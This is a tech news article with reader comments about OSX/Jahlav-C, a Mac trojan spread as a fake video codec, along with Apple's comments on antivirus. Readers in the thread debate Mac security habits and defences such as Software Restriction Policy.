Mac OS X malware posing as fake video codec discovered
Summary: Researchers from ParetoLogic are reporting on a newly discovered Mac OS X malware variant posing as fake video ActiveX object found at a bogus Macintosh PortTube site.The use of fake video codecs is a social engineering tactic exclusively used by malware targeting Windows, and seeing it used in a Mac OS X based malware attack proves that successful social engineering approaches remain OS independent.
Researchers from ParetoLogic are reporting on a newly discovered Mac OS X malware variant posing as fake video ActiveX object found at a bogus Macintosh PortTube site.
The use of fake video codecs is a social engineering tactic exclusively used by malware targeting Windows, and seeing it used in a Mac OS X based malware attack proves that successful social engineering approaches remain OS independent.
Prior to PareteLogic's sample, SophosLabs appear to have received an email from the author of last month's discovered OSX/Tored-A sample, allowing them to add generic detection for any upcoming releases.
Here are some of the PornTube templates used in the social engineering attack, a description of the malware, as well the descriptive filenames used in some of the campaigns:
OSX/Jahlav-C is described as:
"OSX/Jahlav-C is a Trojan created for the Mac OS X operating system. The initial malicious installer is distributed as a missing Video ActiveX Object.
As a part of the installation a malicious shell script file AdobeFlash is created in /Library/Internet Plug-Ins folder and setup to periodically run. The script contains another shell script in an encoded format which in turn contains a Perl script with the main malicious payload. The perl script uses http to communicate with a remote website and download code supplied by the attacker."
The campaign is also using descriptive files such as, HDTVPlayerv3.5.dmg; VideoCodec.dmg; FlashPlayer.dmg; MacTubePlayer.dmg; macvideo.dmg; License.v.3.413.dmg; play-video.dmg, and QuickTime.dmg.
What's Apple's take on this emerging trend?
Earlier this week, in a rare comment of potential Mac OS X related insecurities in the face of malware, the company not only acknowledged OS X Malware, but also pointed out that :
"The Mac is designed with built-in technologies that provide protection against malicious software and security threats right out of the box. However, since no system can be 100 percent immune from every threat, antivirus software may offer additional protection."
Is the company finally taking the right decision to generate security awareness on a threat that is prone to become a daily routine in the long term, or was it too slow to stop using the Mac's massively advertised immunization to malware as a key differentiation factor?
What do you think?
Talkback.
Kick off your day with ZDNet's daily email newsletter. It's the freshest tech news and opinion, served hot. Get it.
Talkback
The Apple dilemma
Publicly admitting that OSX is far from immune to malware will muddle the simplistic PR message that ?macs don?t get virus?.
They are unscrupulously balancing that act at the moment. They know that it is only a matter of time before something serious hits the OSX community. From there on they cannot use that PR tool any more.
The criminals behind this fake codec have clearly demonstrated intent. They have the malware code prepared. Rest assured that the Java Data class deserialization bug has their attention.
Compared to a fake codec, exploiting the Java bug is just a short jump.
But
That's true. And as we've seen with Windows people are all too trusting...
1. Use safe computing habits including knowing the source of the software you're about to install.
2. Use A/V software.
Unfortunately the reality is option one is asking too much from users so option two is typically employed.
Your right.
The problem...
hmm...
Isn't that the implied result of honeymonster's OP?
Why yes, yes it is. Which is why I said:
@ye
That is not what I said
But I do believe that many OSX users have grown complacent as a result of Apple marketing. There's plenty of evidence of that in the comments sections on this site.
What is interesting about this attack - as opposed to the previous ones - is that it appears that the attacker(s) actually invested some time in this. The previous attacks has all the marks of being amateurish attempts.
When the well-established and highly skilled attackers start migrating over from the Windows platform, that's when the disaster will strike. Certainly the Java bug has the potential for that.
Is that not the conclusion you were attempting to imply?
Problem is....
See this post of mine:
I agree.....
We're moving to McAfee and...
I'm a Mac user...
Speaking for Mac users??
I never download anything unless, I go to a site I trust, which is few. Messages to update, only serve to motivate me, to go to the appropriate site without clicking on an automatically generated message to begin a download.
When web surfing, I pay attention to my hard drive. If it becomes active when I don't think it should be, I quit the browser. If the browser won't quit, I'll pull the plug. As often as possible, I also spend the extra money for a disk, instead of downloading updates.
I don't consider myself 100% impervious to these problems, but in 24 years, I've never had a virus or Trojan. Perhaps it's because some of use Mac users actually are quite careful.
Human Behavior
You are right in implying one would need to do a poll to prove poor security behavior of mac users. You would also have to do a poll to prove the average Mac users are more computer literate than the average PC user. With-out proof of either, the typical human behavior must assumed to be true. Your argument is based on an average persons behavior being different than behavior that has a widespread proven track record. The burden of proof is on you to prove a difference in behavior of mac users over PC. You need to show why the proven track record is incorrect. In this case present some evidence the average Mac users behavior is different in security practices than the average PC user. Otherwise the underlining argument that there is are huge security land mines waiting to go off on Macs stands true.
Consider using SRP
And then you list using safe computing habits / user education, and security software.
Here's another: use low-rights user accounts in combination with Software Restriction Policy, if your version of Windows features SRP. XP Home and Vista Home editions don't have SRP, but XP Pro/MCE and Vista Business/Ultimate/Enterprise do. With SRP set to disallowed-by-default, the only executable files your users can execute, are the ones the Admin put on the system. And if they don't have Admin rights, that pretty much settles things: Trojans will be arbitrarily prevented from execution. So will exploit payloads. So will AutoRun malware. So will unauthorized portable apps. No license fees, no renewals, no signature updates, and in an AD domain, no need to go set it up manually. Just configure it via Group Policy.
Here's one way you can set up SRP: http://www.mechbgon.com/srp If you want the official Microsoft page for further options, see http://technet.microsoft.com/en-us/windows/cc507878.aspx
Not entirely true
The attacker can also "blend" with a local privilege escalation bug and then he has root. No questions asked. There have been plenty of privilege escalation bugs and there are probably many more.
This is far easier on operating system / browser combinations without sandboxing. OSX doesn?t feature sandboxing. Chrome will probably have a sandbox when launched for OSX.
Not really
Well, where is it? A couple of fake trojans aren't going anything.
You have to realize that a large number of Mac users are switchers, and coming from Windows they do have the basic experienced required to avoid this simple kind of malware. Fortunately, malware under OS X is not as automated as it is for Windows.